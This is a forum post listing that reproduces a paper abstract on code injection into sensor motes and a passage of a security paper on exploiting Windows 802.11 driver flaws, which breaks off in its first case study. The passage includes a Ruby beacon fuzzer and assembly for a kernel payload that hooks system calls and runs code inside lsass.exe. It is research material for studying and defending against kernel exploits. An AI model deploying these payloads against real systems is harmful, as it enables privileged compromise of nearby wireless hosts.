Jump to content

Nytro

Administrators
  • Posts

    18715
  • Joined

  • Last visited

  • Days Won

    701

Everything posted by Nytro

  1. Code Injection Attacks on Harvard-Architecture Devices Aurélien Francillon INRIA Rhône-Alpes 655 avenue de l’Europe, Montbonnot 38334 Saint Ismier Cedex, France aurelien.francillon@inria.fr Claude Castelluccia INRIA Rhône-Alpes 655 avenue de l’Europe, Montbonnot 38334 Saint Ismier Cedex, France claude.castelluccia@inria.fr ABSTRACT Harvard architecture CPU design is common in the embed- ded world. Examples of Harvard-based architecture devices are the Mica family of wireless sensors. Mica motes have limited memory and can process only very small packets. Stack-based buer over ow techniques that inject code into the stack and then execute it are therefore not applicable. It has been a common belief that code injection is impossible on Harvard architectures. This paper presents a remote code injection attack for Mica sensors. We show how to exploit program vulnerabilities to permanently inject any piece of code into the program memory of an Atmel AVR-based sen- sor. To our knowledge, this is the rst result that presents a code injection technique for such devices. Previous work only succeeded in injecting data or performing transient at- tacks. Injecting permanent code is more powerful since the attacker can gain full control of the target sensor. We also show that this attack can be used to inject a worm that can propagate through the wireless sensor network and possibly create a sensor botnet. Our attack combines dierent tech- niques such as return oriented programming and fake stack injection. We present implementation details and suggest some counter-measures. Download: www.inrialpes.fr/planete/people/ccastel/PAPERS/CCS08.pdf
  2. Exploiting 802.11 Wireless Driver Vulnerabilities on Windows Exploiting 802.11 Wireless Driver Vulnerabilities on Windows 11/2006 Johnny Cache (johnycsh[a t]802.11mercenary.net) H D Moore (hdm[a t]metasploit.com) skape (mmiller[a t]hick.org) 1) Foreword Abstract: This paper describes the process of identifying and exploiting 802.11 wireless device driver vulnerabilities on Windows. This process is described in terms of two steps: pre-exploitation and exploitation. The pre-exploitation step provides a basic introduction to the 802.11 protocol along with a description of the tools and libraries the authors used to create a basic 802.11 protocol fuzzer. The exploitation step describes the common elements of an 802.11 wireless device driver exploit. These elements include things like the underlying payload architecture that is used when executing arbitrary code in kernel-mode on Windows, how this payload architecture has been integrated into the 3.0 version of the Metasploit Framework, and the interface that the Metasploit Framework exposes to make developing 802.11 wireless device driver exploits easy. Finally, three separate real world wireless device driver vulnerabilities are used as case studies to illustrate the application of this process. It is hoped that the description and illustration of this process can be used to show that kernel-mode vulnerabilities can be just as dangerous and just as easy to exploit as user-mode vulnerabilities. In so doing, awareness of the need for more robust kernel-mode exploit prevention technology can be raised. Thanks: The authors would like to thank David Maynor, Richard Johnson, and Chris Eagle. 2) Introduction Software security has matured a lot over the past decade. It has gone from being an obscure problem that garnered little interest from corporations to something that has created an industry of its own. Corporations that once saw little value in investing resources in software security now have entire teams dedicated to rooting out security issues. The reason for this shift in attitude is surely multifaceted, but it could be argued that the greatest influence came from improvements to exploitation techniques that could be used to take advantage of software vulnerabilities. The refinement of these techniques made it possible for reliable exploits to be used without any knowledge of the vulnerability. This shift effectively eliminated the already thin crutch of barrier-to-entry complacency which many corporations were guilty of leaning on. Whether or not the refinement of exploitation techniques was indeed the turning point, the fact remains that there now exists an industry that has been spawned in the name of software security. Of particular interest for the purpose of this paper are the corporations and individuals within this industry that have invested time in researching and implementing solutions that attempt to tackle the problem of exploit prevention. As a result of this time investment, things like non-executable pages, address space layout randomization (ASLR), stack canaries, and other novel preventative measures are becoming common place in the desktop market. While there should be no argument that the main-stream integration of many of these technologies is a good thing, there's a problem. This problem centers around the fact that the majority of these exploit prevention solutions to date have been slightly narrow-sighted in their implementations. In particular, these solutions generally focus on preventing exploitation in only one context: user-mode. This is not true in all cases. The authors would like to take care to mention that solutions like grsecurity from the PaX team have had support for features that help to provide kernel-level security. Furthermore, stack canary implementations have existed and are integrated with many mainstream kernels. However, not all device drivers have been compiled to take advantage of these new enhancements. The reason for this narrow-sightedness is often defended based on the fact that kernel-mode vulnerabilities have been far less prevalent. Furthermore, kernel-mode vulnerabilities are considered by most to require a much more sophisticated attack when compared with user-mode vulnerabilities. The prevalence of kernel-mode vulnerabilities could be interpreted in many different ways. The naive way would be to think that kernel-mode vulnerabilities really are few and far between. After all, this is code that should have undergone rigorous code coverage testing. A second interpretation might consider that kernel-mode vulnerabilities are more complex and thus harder to find. A third interpretation might be that there are fewer eyes focused on looking for kernel-mode vulnerabilities. While there are certainly other factors, the authors feel that it is probably best captured by the second and third interpretation. Even if prevalence is affected because of the relative difficulty of exploiting kernel-mode vulnerabilities, it's still a poor excuse for exploit prevention solutions to simply ignore it. The past has already shown that exploitation techniques for user-mode vulnerabilities were refined to the point of creating increasingly reliable exploits. These increasingly reliable exploits were then incorporated into automated worms. What's so different about kernel-mode vulnerabilities? Sure, they are complicated, but so were heap overflows. The authors see no reason to expect that kernel-mode vulnerabilities won't also experience a period of revolutionary public advancements to existing exploitation techniques. In fact, this period has already started[5,2,1]. Still, most corporations seem content to lean on the same set of crutches, waiting for proof that a problem really exists. It's hoped that this paper can assist in the process of making it clear that kernel-mode vulnerabilities can be just as easy to exploit as user-mode vulnerabilities. It really shouldn't come as a surprise that kernel-mode vulnerabilities exist. The intense focus put upon preventing the exploitation of user-mode vulnerabilities has caused kernel-mode security to lag behind. This lag is further complicated by the fact that developers who write kernel-mode software must generally have a completely different mentality relative to what most user-mode developers are acustomed to. This is true regardless of what operating system a programmer might be dealing with (so long as it's a task-oriented operating system with a clear separation between system and user). User-mode programmers who decide to dabble in writing device drivers for NT will find themselves in for a few surprises. The most apparent thing one would notice is that the old Windows Driver Model (WDM) and the new Windows Driver Framework (WDF) represent completely different APIs relative to what a user-mode developer would be familiar with. There are a number of standard C runtime artifacts that can still be used, but their use in device driver code stands out like a sore thumb. This fact hasn't stopped developers from using dangerous string functions. While the API being completely different is surely a big hurdle, there are a number of other gotchas that a user-mode programmer wouldn't normally find themselves worrying about. One of the most interesting limitations imposed upon device driver developers is the conservation of stack space. On modern derivatives of NT, kernel-mode threads are only provided with 3 pages (12288 bytes) of stack space. In user-mode, thread stacks will generally grow as large as 256KB (this default limit is controlled by the optional header of an executable binary). Due to the limited amount of kernel-mode thread stack space, it should be rare to ever see a device driver consuming a large amount of space within a stack frame. Nevertheless, it was observed that the Intel Centrino drivers have multiple instances of functions that consume over 1 page of stack space. That's 33% of the available stack space wasted within one stack frame! Perhaps the most important of all of the differences is the extra care that must be taken when it comes to dealing with things like performance, error handling, and re-entrancy. These major elements are critical to ensuring the stability of the operating system as a whole. If a programmer is negligent in their handling of any of these things in user-mode, the worst that will happen is the application will crash. In kernel-mode, however, a failure to properly account for any of these elements will generally affect the stability of the system as a whole. Even worse, security related flaws in device drivers provide a point of exposure that can result in super-user privileges. From this very brief introduction, it is hoped that the reader will begin to realize that device driver development is a different world. It's a world that's filled with a greater number of restrictions and problems, where the implications of software bugs are much greater than one would normally see in user-mode. It's a world that hasn't yet received adequate attention in the form of exploit prevention technology, thus making it possible to improve and refine kernel-mode exploitation techniques. It should come as no surprise that such a world would be attractive to researchers and tinkerers alike. This very attraction is, in fact, one of the major motivations for this paper. While the authors will focus strictly on the process used to identify and exploit flaws in wireless device drivers, it should be noted that other device drivers are equally likely to be prone to security issues. However, most other device drivers don't have the distinction of exposing a connectionless layer2 attack surface to all devices in close proximity. Frankly, it's hard to get much cooler than that. That only happens in the movies, right? To kick things off, the structure of this paper is as follows. In chapter 3, the steps used to find vulnerabilities in wireless device drivers, such as through the use of fuzzing, are described. Chapter 4 explains the process of actually leveraging a device driver vulnerability to execute arbitrary code and how the 3.0 version of the Metasploit Framework has been extended to make this trivial to deal with. Finally, chapter 5 provides three real world examples of wireless device driver vulnerabilities. Each real world example describes the trials and tribulations of the vulnerability starting with the initial discovery and ending with arbitrary code execution. 3) Pre-Exploitation This chapter describes the tools and strategies used by the authors to identify 802.11 wireless device driver vulnerabilities. Section 3.1 provides a basic description of the 802.11 protocol in order to provide the reader with information necessary to understand the attack surface that is exposed by 802.11 device drivers. Section 3.2 describes the basic interface exposed by the 3.0 version of the Metasploit Framework that makes it possible to craft arbitrary 802.11 packets. Finally, section 3.3 describes a basic approach to fuzzing certain aspects of the way a device driver handles certain 802.11 protocol functions. 3.1) Attack Surface Device drivers suffer from the same types of vulnerabilities that apply to any other code written in the C programming language. Buffer mismanagement, faulty pointer math, and integer overflows can all lead to exploitable conditions. Device driver flaws are often seen as a low risk issue due to the fact that most drivers do not process attacker-controlled data. The exception, of course, are drivers for networking devices. Although Ethernet devices (and their drivers) have been around forever, the simplicity of what the driver has to handle has greatly limited the attack surface. Wireless drivers are required to handle a wider range of requests and are also required to expose this functionality to anyone within range of the wireless device. In the world of 802.11 device drivers, the attack surface changes based on the state of the device. The three primary states are: 1. Unauthenticated and Unassociated 2. Authenticated and Unassociated 3. Authenticated and Associated In the first state, the client is not connected to a specific wireless network. This is the default state for 802.11 drivers and will be the focus for this section. The 802.11 protocol defines three different types of frames: Control, Management, and Data. These frame types are further divided into three classes (1, 2, and 3). Only frames in the first class are processed in the Unauthenticated and Unassociated state. The following 802.11 management sub-types are processed by clients while in state 1[3]: 1. Probe Request 2. Probe Reponse 3. Beacon 4. Authentication The Probe Response and Beacon sub-types are used by wireless devices to discover and advertise the local wireless networks. Clients can transmit Probe Responses to discover networks as well (more below). The Authentication sub-type is used to join a specific wireless network and reach the second state. Wireless clients discover the list of available networks in two different ways. In Active Mode, the client will send a Probe Request containing an empty SSID field. Any access point in range will reply with a Probe Response containing the parameters of the wireless network it serves. Alternatively, the client can specify the SSID it is looking for. In Passive Mode, clients will listen for Beacon requests and read the network parameters from within the beacon. Since both of these methods result in a frame that contains wireless network information, it makes sense for the frame format to be similar. The method chosen by the client is determined by the capabilities of the device and the application using the driver. A beacon frame includes a generic 802.11 header that defines the packet type, source, destination, Basic Service Set ID (BSSID) and other envelope information. Beacons also include a fixed-length header that is composed of a timestamp, beacon interval, and a capabilities field. The fixed-length header is followed by one or more Information Elements (IEs) which are variable-length fields and contain the bulk of the access point information. A probe response frame is almost identical to a beacon frame except that the destination address is set to that of the client whereas beacons set it to the broadcast address. Information elements consist of an 8-bit type field, an 8-bit length field, and up to 255 bytes of data. This type of structure is very similar to the common Type-Length-Value (TLV) form used in many different protocols. Beacon and probe response packets must contain an SSID IE, a Supported Rates IE, and a Channel IE for most wireless clients to process the packet. The 802.11 specification states that the SSID field (the human name for a given wireless network) should be no more than 32 bytes long. However, the maximum length of an information element is 255 bytes long. This leaves quite a bit of room for error in a poorly-written wireless driver. Wireless drivers support a large number of different information element types. The standard even includes support for proprietary, vendor-specific IEs. 3.2) Packet Injection In order to attack a driver's beacon and probe response processing code, a method of sending raw 802.11 frames to the device is needed. Although the ability to send raw 802.11 packets is not a supported feature in most wireless cards, many open-source drivers can be convinced to integrate support with a small patch. A few even support it natively. Under the Linux operating system, there is a wide range of hardware and drivers that support raw packet injection. Unfortunately, each driver provides a slightly different interface for accessing this feature. To support many different wireless cards, a hardware-independent method for sending raw 802.11 frames is needed. The solution is the LORCON library (Loss of Radio Connectivity), written by Mike Kershaw and Joshua Wright. This library provides a standardized interface for sending raw 802.11 packets through a variety of supported drivers. However, this library is written in C and does not expose any Ruby bindings by default. To make it possible to interact with this library from Ruby, a new Ruby extension (ruby-lorcon) was created that interfaces with the LORCON library and exposes a simple object-oriented interface. This wrapper interface makes it possible to send arbitrary wireless packets from a Ruby script. The easiest way to call the ruby-lorcon interface from a Metasploit module is through a mixin. Mixins are used in the 3.0 version of the Metasploit Framework to improve code reuse and allow any module to import a rich feature set simply by including the right mixins. The mixin that exists for LORCON provides three new user options and a simple API for opening the interface, sending packets, and changing the channel. +-----------+----------+----------+--------------------------------------------+ | Name | Default | Required | Description | +-----------+----------+----------+--------------------------------------------+ | CHANNEL | 11 | yes | The default channel number | | DRIVER | madwifi | yes | The name of the wireless driver for lorcon | | INTERFACE | ath0 | yes | The name of the wireless interface | +-----------+----------+----------+--------------------------------------------+ A Metasploit module that wants to send raw 802.11 packets should include the Msf::Exploit::Lorcon mixin. When this mixin is used, a module can make use of wifi.open() to open the interface and wifi.write() to send packets. The user will specify the INTERFACE and DRIVER options for their particular hardware and driver. The creation of the 802.11 packet itself is left in the hands of the module developer. 3.3) Vulnerability Discovery One of the fastest ways to find new flaws is through the use of a fuzzer. In general terms, a fuzzer is a program that forces an application to process highly variant data that is typically malformed in the hopes that one of the attempts will yield a crash. Fuzzing a wireless device driver depends on the device being in a state where specific frames are processed and a tool that can send frames likely to cause a crash. In the first part of this chapter, the authors described the default state of a wireless client and what types of management frames are processed in this state. The two types of frames that this paper will focus on are Beacons and Probe Responses. These frames have the following structure: +------+----------------------+ | Size | Description | +------+----------------------+ | 1 | Frame Type | | 1 | Frame Flags | | 2 | Duration | | 6 | Destination | | 6 | Source | | 6 | BSSID | | 2 | Sequence | | 8 | Timestamp | | 2 | Beacon Interval | | 2 | Capability Flags | | Var | Information Elements | | 2 | Frame Checksum | +------+----------------------+ The Information Elements field is a list of variable-length structures consisting of a one byte type field, a one byte length field, and up to 255 bytes of data. Variable-length fields are usually good targets for fuzzing since they require special processing when the packet is parsed. To attack a driver that uses Passive Mode to discover wireless networks, it's necessary to flood the target with mangled Beacons. To attack a driver that uses Active Mode, it's necessary to flood the target with mangled Probe Responses while forcing it to scan for networks. The following Ruby code generates a Beacon frame with randomized Information Element data. The Frame Checksum field is automatically added by the driver and does not need to be included. # # Generate a beacon frame with random information elements # # Maximum frame size (max is really 2312) mtu = 1500 # Number of information elements ies = rand(1024) # Randomized SSID ssid = Rex::Text.rand_text_alpha(rand(31)+1) # Randomized BSSID bssid = Rex::Text.rand_text(6) # Randomized source src = Rex::Text.rand_text(6) # Randomized sequence seq = [rand(255)].pack('n') # Capabiltiies cap = Rex::Text.rand_text(2) # Timestamp tstamp = Rex::Text.rand_text(8) frame = "\x80" + # type/subtype (mgmt/beacon) "\x00" + # flags "\x00\x00" + # duration "\xff\xff\xff\xff\xff\xff" + # dst (broadcast) src + # src bssid + # bssid seq + # seq tstamp + # timestamp value "\x64\x00" + # beacon interval cap # capabilities # First IE: SSID "\x00" + ssid.length.chr + ssid + # Second IE: Supported Rates "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" + # Third IE: Current Channel "\x03" + "\x01" + channel.chr # Generate random Information Elements and append them 1.upto(ies) do |i| max = mtu - frame.length break if max < 2 t = rand(256) l = (max - 2 == 0) ? 0 : (max > 255) ? rand(255) : rand(max - 1) d = Rex::Text.rand_text(l) frame += t.chr + l.chr + d end While this is just one example of a simple 802.11 fuzzer for a particular frame, much more complicated, state-aware fuzzers could be implemented that make it possible to fuzz other packet handling areas of wireless device drivers. 4) Exploitation After an issue has been identified through the use of a fuzzer or through manual analysis, it's necessary to begin the process of determining a way to reliably gain control of the instruction pointer. In the case of stack-based buffer overflows on Windows, this process is often as simple as determining the offset to the return address and then overwriting it with an address of an instruction that jumps back into the stack. That's the best case scenario, though, and there are often other hurdles that one may have to overcome regardless of whether or not the vulnerability exists in a device driver or in a user-mode program. These hurdles and other factors are what tend to make the process of getting reliable control of the instruction pointer one of the most challenging steps in exploit development. Rather than exhaustively describing all of the problems one could run into, the authors will instead provide illustrations in the form of real world examples included in chapter 5. Assuming reliable control of the instruction pointer can be gained, the development of an exploit typically transitions into its final stage: arbitrary code execution. In user-mode, this stage has been completely automated for most exploit developers. It's become common practice to simply use Metasploit's user-mode payload generator. Kernel-mode payloads, on the other hand, have not seen an integrated solution for producing reliable payloads that can be dropped into any exploit. That's certainly not to say that there hasn't been previous work dealing with kernel-mode payloads, as there definitely has been[2,1], but their form up to now has been one that is not particularly easy to adopt. This lack of easy to use kernel-mode payloads can be seen as one of the major reasons why there has not been a large number of public, reliable kernel-mode exploits. Since one of the goals of this paper is to illustrate how kernel-mode exploits can be written just as easily as user-mode exploits, the authors determined that it was necessary to incorporate the existing set of kernel-mode payload ideas into the 3.0 version of the Metasploit framework where they could be used freely with any future kernel-mode exploits. While this final integration was certainly the end-goal, there were a number of important steps that had to be taken before the integration could occur. The following sections will attempt to provide this background. In section 4.1, details regarding the payload architecture that the authors selected is described in detail. This section also includes a description of the interface that has been exposed in the 3.0 version of the Metasploit Framework for developers who wish to implement kernel-mode exploits. 4.1) Payload Architecture The payload architecture that the authors decided to integrate was based heavily off previous research[1]. As was alluded to in the introduction, there are a number of complicated considerations that must be taken into account when dealing with kernel-mode exploitation. A large majority of these considerations are directly related to what methods should be used when executing arbitrary code in the kernel. For example, if a device driver was holding a lock at the time that an exploit was triggered, what might be the best way to go about releasing that lock so as to recover the system so that it will still be possible to interact with it in a meaningful way? Other types of considerations include things like IRQL restrictions, cleaning up corrupted structures, and so on. These considerations lead to there being many different ways in which a payload might best be implemented for a particular vulnerability. This is quite a bit different from the user-mode environment where it's almost always possible to use the exact same payload regardless of the application. Though these situational complications do exist, it is possible to design and implement a payload system that can be applied in almost any circumstance. By separating kernel-mode payloads into variable components, it becomes possible to combine components together in different ways to form functional variations that are best suited for particular situations. In Windows Kernel-mode Payload Fundamentals [1], kernel-mode payloads are broken down into four different components: migration, stagers, recovery, and stages. When describing kernel-mode payloads in terms of components, the migration component would be one that is used to migrate from an unsafe execution environment to a safe execution environment. For example, if the IRQL is at DISPATCH when a vulnerability is triggered, it may be necessary to migrate to a safer IRQL such as PASSIVE. It is not always necessary to have a migration component. The purpose of a stager component is to move some portion of the payload so that it executes in the context of another thread context. This may be necessary if the current thread is of critical importance or may lead to a deadlock of the system should certain operations be used. The use of a stager may obviate the need for a migration component. A recovery component is something that is used to restore the system to clean state and then continue execution. This component is generally one that may require customization for a given vulnerability as it may not always be possible to describe the steps needed to recover the system in a generic way. For example, if locks were held at the time that the vulnerability was triggered, it may be necessary to find a way to release those locks and then continue execution from a safe point. Finally, the stage component is a catch-all for whatever arbitrary code may be executed once the payload is running in a safe environment. This model for describing kernel-mode payloads is what the authors decided to adopt. To better understand how this model works, it seems best to describe how it was applied for all three real world vulnerabilities that are shown in chapter 5. These three vulnerabilities actually make use of the same basic underlying payload, which will henceforth be referred to as ``the payload'' for brevity. The payload itself is composed of three of the four components. Each of the payload components will be discussed individually and then as a whole to provide an idea for how the payload operates. The first component that exists in the payload is a stager component. The stager that the authors chose to use is based on the SharedUserData SystemCall Hook stager described in [1]. Before understanding how the stager works, it's important to understand a few things. As the name implies, the stager accomplishes its goal by hooking the SystemCall attribute found within SharedUserData. As a point of reference, SharedUserData is a global page that is shared between user-mode and kernel-mode. It acts as a sort of global structure that contains things like tick count and time information, version information, and quite a few other things. It's extremely useful for a few different reasons, not the least of which being that it's located at a fixed address in user-mode and in kernel-mode on all NT derivatives. This means that the stager is instantly portable and doesn't need to perform any symbol resolution to locate the address, thus helping to keep the overall size of the payload small. The SystemCall attribute that is hooked is part of an enhancement that was added in Windows XP. This enhancement was designed to make it possible to use optimized system call instructions depending on what hardware support is present on a given machine. Prior to Windows XP, system calls were dispatched from user-mode through the hardcoded use of the int 0x2e soft interrupt. Over time, hardware enhancements were made to decrease the overhead involved in performing a system call, such as through the introduction of the sysenter instruction. Since Microsoft isn't in the business of providing different versions of Windows for different makes and models of hardware, they decided to determine at runtime which system call interface to use. SharedUserData was the perfect candidate for storing the results of this runtime determination as it was already a shared page that existed in every user-mode process. After making these modifications, ntdll.dll was updated to dispatch system calls through SharedUserData rather than through the hardcoded use of int 0x2e. The initial implementation of this new system call dispatching interface placed executable code within the SystemCall attribute of SharedUserData. Subsequent versions of Windows, such as XP SP2, turned the SystemCall attribute into a function pointer. One important implication about the introduction of the SystemCall attribute to SharedUserData is that it represents a pivot point through which all system call dispatching occurs in user-mode. In previous versions of Windows, each user-mode system call stub routine invoked int 0x2e directly. In the latest versions, these stub routines make indirect calls through the SystemCall function pointer. By default, this function pointer is initialized to point to one of a few exported symbols within ntdll.dll. However, the implications of this function pointer being changed to point elsewhere mean that it would be possible to intercept all system calls within all processes. This implication is what forms the very foundation for the stager that is used by the payload. When the stager begins executing, it's running in kernel-mode in the context of the thread that triggered the vulnerability. The first action it takes is to copy a chunk of code (the stage) into an unused portion of SharedUserData using the predictable address of 0xffdf037c. After the copy operation completes, the stager proceeds by hooking the SystemCall attribute. This hook must be handled differently depending on whether or not the target operating system is pre-XP SP2 or not. More details on how this can be handled are described in [1]. Regardless of the approach, the SystemCall attribute is redirected to point to 0x7ffe037c. This predictable location is the user-mode accessible address of the unused portion of SharedUserData where the stage was copied into. After the hooking operation completes, all system calls invoked by user-mode processes will first go through the stage placed at 0x7ffe037c. The stager portion of the payload looks something like this (note, this implementation is only designed to work on XP SP2 and Windows 2003 Server SP1. Modifications would need to be made to make it work on previous versions of XP and 2003): ; Jump/Call to get the address of the stage 00000000 EB38 jmp short 0x3a 00000002 BB0103DFFF mov ebx,0xffdf0301 00000007 4B dec ebx 00000008 FC cld ; Copy the stage into 0xffdf037c 00000009 8D7B7C lea edi,[ebx+0x7c] 0000000C 5E pop esi 0000000D 6AXX push byte num_stage_dwords 0000000F 59 pop ecx 00000010 F3A5 rep movsd ; Set edi to the address of the soon-to-be function pointer 00000012 BF7C03FE7F mov edi,0x7ffe037c ; Check to make sure the hook hasn't already been installed 00000017 393B cmp [ebx],edi 00000019 7409 jz 0x24 ; Grab SystemCall function pointer 0000001B 8B03 mov eax,[ebx] 0000001D 8D4B08 lea ecx,[ebx+0x8] ; Store the existing value in 0x7ffe0308 00000020 8901 mov [ecx],eax ; Overwrite the existing function pointer and make things live! 00000022 893B mov [ebx],edi ; recovery stub here 0000003A E8C3FFFFFF call 0x2 ; stage here With the hook in place, the stager has completed its primary task which was to copy a stage into a location where it could be executed in the future. Before the stage can execute, the stager must allow the recovery component of the payload to execute. As mentioned previously, the recovery component represents one of the most vulnerability-specific portions of any kernel-mode payload. For the purpose of the exploits described in chapter 5, a special purpose recovery component was necessary. This particular recovery component was required due to the fact that the example vulnerabilities are triggered in the context of the Idle thread. On Windows, the Idle thread is a special kernel thread that executes whenever a processor is idle. Due to the nature of the way the Idle thread operates, it's dangerous to perform operations like spinning the thread or any of the other recovery methods described in [1]. It may also be possible to apply the technique for delaying execution within the Idle thread as discussed in [2]. The recovery method that was finally selected involves two basic steps. First, the IRQL for the current processor is restored to DISPATCH level just in case it was executing at a higher IRQL. Second, execution control is transferred into the first instruction of nt!KiIdleLoop after initializing registers appropriately. The end effect is that the idle thread begins executing all over again and, if all goes well, the system continues operating as if nothing had happened. In practice, this recovery method has been proven reliable. However, the one negative that it is has is that it requires knowledge of the address that nt!KiIdleLoop resides at. This dependence represents an area that is ripe for future improvement. Regardless of limitations, the recovery component for the payload looks like the code below: ; Restore the IRQL 00000024 31C0 xor eax,eax 00000026 64C6402402 mov byte [fs:eax+0x24],0x2 ; Initialize assumed registers 0000002B 8B1D1CF0DFFF mov ebx,[0xffdff01c] 00000031 B827BB4D80 mov eax,0x804dbb27 00000036 6A00 push byte +0x0 ; Transfer control to nt!KiIdleLoop 00000038 FFE0 jmp eax After the recovery component has completed its execution, all of the payload code that was originally executing in kernel-mode is complete. The final portion of the payload that remains to be executed is the stage that was copied by the stager. The stage itself runs in user-mode within all process contexts, and it executes every time a system call is dispatched. The implications of this should be obvious. Having a stage that executes within every process every time a system call occurs is just asking for trouble. For that reason, it makes sense to design a generic user-mode stage that can be used to limit the times that it executes to one particular context. The approach that the authors took to meet this requirement is as follows. First, the stage performs a check that is designed to see if it is running in the context of a specific process. This check is there in order to help ensure that the stage itself only executes in a known-good environment. As an example, it would be a shame to take advantage of a kernel-mode vulnerability only to finally execute code with the privileges of Guest. By default, this check is designed to see if the stage is running within lsass.exe, a process that runs with SYSTEM level privileges. If the stage is running within lsass, it performs a check to see if the SpareBool attribute of the Process Environment Block has been set to one. By default, this value is initialized to zero in all processes. If the SpareBool attribute is set to zero, then the stage proceeds to set the SpareBool attribute to one and then finishes by executing whatever code is remaining within the stage. If the SpareBool attribute is set to one, which means the stage has already run, or it's not running within lsass, it transfers control back to the original system call dispatching routine. This is necessary because it is still a requirement that system calls from user-mode processes be dispatched appropriately, otherwise the system itself would grind to a halt. An example of what this stage might look like is shown below: ; Preserve the calling environment 0000003F 60 pusha 00000040 6A30 push byte +0x30 00000042 58 pop eax 00000043 99 cdq 00000044 648B18 mov ebx,[fs:eax] ; Check if Peb->Ldr is NULL 00000047 39530C cmp [ebx+0xc],edx 0000004A 7426 jz 0x72 ; Extract Peb->ProcessParameters->ImagePathName.Buffer 0000004C 8B5B10 mov ebx,[ebx+0x10] 0000004F 8B5B3C mov ebx,[ebx+0x3c] ; Add 0x28 to the image path name (skip past c:\windows\system32\) 00000052 83C328 add ebx,byte +0x28 ; Compare the name of the executable with lass 00000055 8B0B mov ecx,[ebx] 00000057 034B03 add ecx,[ebx+0x3] 0000005A 81F96C617373 cmp ecx,0x7373616c ; If it doesn't match, execute the original system call dispatcher 00000060 7510 jnz 0x72 00000062 648B18 mov ebx,[fs:eax] 00000065 43 inc ebx 00000066 43 inc ebx 00000067 43 inc ebx ; Check if Peb->SpareBool is 1, if it is, execute the original ; system call dispatcher 00000068 803B01 cmp byte [ebx],0x1 0000006B 7405 jz 0x72 ; Set Peb->SpareBool to 1 0000006D C60301 mov byte [ebx],0x1 ; Jump into the continuation stage 00000070 EB07 jmp short 0x79 ; Restore the calling environment and execute the original system call ; dispatcher that was preserved in 0x7ffe0308 00000072 61 popa 00000073 FF250803FE7F jmp near [0x7ffe0308] ; continuation of the stage The culmination of these three payload components is a functional payload that can be used in any situation where an exploit is triggered within the Idle thread. If the exploit is triggered outside of the context of the Idle thread, the recovery component can be swapped out with an alternative method and the rest of the payload can remain unchanged. This is one of the benefits of breaking kernel-mode payloads down into different components. To recap, the payload works by using a stager to copy a stage into an unused portion of SharedUserData. The stager then points the SystemCall attribute to that unused portion, effectively causing all user-mode processes to bounce through the stage when they attempt to make a system call. Once the stager has completed, the recovery component restores the IRQL to DISPATCH and then restarts the Idle thread. The kernel-mode portion of the payload is then complete. Shortly after that, the stage that was copied to SharedUserData is executed in the context of a specific user-mode process, such as lsass.exe. Once this occurs, the stage sets a flag that indicates that it's been executed and completes. All told, the payload itself is only 115 bytes, excluding any additional code in the stage. Given all of this infrastructure work, it's trivial to plug almost any user-mode payload into the stage. The additional code must simply be placed at the point where it's verified that it's running in a particular process and that it hasn't been executed before. The reason for it being so trivial was quite intentional. One of the major goals in implementing this payload system was to make it possible to use the existing set of payloads that exist in the Metasploit framework in conjunction with any kernel-mode exploit. This includes even some of the more powerful payloads such as Meterpreter and VNC injection. There were two key elements involved in integrating kernel-mode payloads into the 3.0 version of the Metasploit Framework. The first had to do with defining the interface that exploit developers would need to use when writing kernel-mode exploits. The second delt with defining the interface the end-users would have to be aware of when using kernel-mode exploits. In terms of precedence, defining the programming level interfaces first is the ideal approach. To that point, the programming interface that was decided upon is one that should be pretty easy to use. The majority of the complexity involved in selecting a kernel-mode payload is hidden from the developer. There are only a few basic things that the developer needs to be aware of. When implementing a kernel-mode exploit in Metasploit 3.0, it is necessary to include the Msf::Exploit::KernelMode mixin. This mixin provides hints to the framework that make it aware of the fact that any payloads used with this exploit will need to be appropriately encapsulated within a kernel-mode stager. With this simple action, the majority of the work associated with the kernel-mode payload is abstracted away from the developer. The only other elements that a developer may need to deal with is the process of defining extended parameters that are used to further control the process of selecting different aspects of the kernel-mode payload. These controlable parameters are exposed to developers through the ExtendedOptions hash element in an exploit's global or target-specific Payload options. An example of what this might look like within an exploit can be seen here: 'Payload' => { 'ExtendedOptions' => { 'Stager' => 'sud_syscall_hook', 'Recovery' => 'idlethread_restart', 'KiIdleLoopAddress' => 0x804dbb27, } } In the above example, the exploit has explicitly selected the underlying stager component that should be used by specifying the Stager hash element. The sudsyscallhook stager is a symbolic name for the stager that was described in section 4.1. The example above also has the exploit explicitly selecting the recovery component that should be used. In this case, the recovery component that is selected is idlethreadrestart which is a symbolic name for the recovery component described previously. Additionally, the nt!KiIdleLoop address is specified for use with this particular recovery component. Under the hood, the use of the KernelMode mixin and the additional extended options results in the framework encapsulating whatever user-mode payload the end-user specified inside of a kernel-mode stager. In the end, this process is entirely transparent to both the developer and the end-user. While the set of options that can be specified in the extended options hash will surely grow in the future, it makes sense to at least document the set of defined elements at the time of this writing. These options include: Recovery: Defines the recovery component that should be used when generating the kernel-mode payload. The current set of valid values for this option include spin, which will spin the current thread, idlethreadrestart, which will restart the Idle thread, or default which is equivalent to spin. Over time, more recovery methods may be added. These can be found in recovery.rb. RecoveryStub: Defines a custom recovery component. Stager: Defines the stager component that should be used when generating the kernel-mode payload. The current set of valid values for this option include sudsyscallhook. Over time, more stager methods may be added. These can be found in stager.rb. UserModeStub: Defines the user-mode custom code that should be executed as part of the stage. RunInWin32Process: Currently only applicable to the sudsyscallhook stager. This element specifies the name of the system process, such as lsass.exe, that should be injected into. KiIdleLoopAddress: Currently only applicable to the idlethreadrestart recovery component. This element specifies the address of nt!KiIdleLoop. While not particularly important to developers or end-users, it may be interesting for some to understand how this abstraction works internally. To start things off, the KernelMode mixin overrides a base class method called encodebegin. This method is called when a payload that is used by an exploit is being encoded. When this happens, the mixin declares a procedure that is called by the payload encoder. In turn, this procedure is called by the payload encoder in the context of encapsulating the pre-encoded payload. The procedure itself is passed the original raw user-mode payload and the payload options hash (which contains the extended options, if any, that were specified in the exploit). It uses this information to construct the kernel-mode stager that is used to encapsulate the user-mode payload. If the procedure completes successfully, it returns a non-nil buffer that contains the original user-mode payload encapsulated within a kernel-mode stager. The kernel-mode stager and other components are actually contained within the payloads subsystem of the Rex library under lib/rex/payloads/win32/kernel. 5) Case Studies This chapter describes three separate vulnerabilities that were found by the authors in real world 802.11 wireless device drivers. These three issues were found through a combination of fuzzing and manual analysis. 5.1) BroadCom The first vulnerability that was subject to the process described in this paper was an issue that was found in BroadCom's wireless device driver. This vulnerability was discovered by Chris Eagle as a result of his interest in doing some reversing of kernel-mode code. Chris noticed what appeared to be a conventional stack overflow in the way the BroadCom 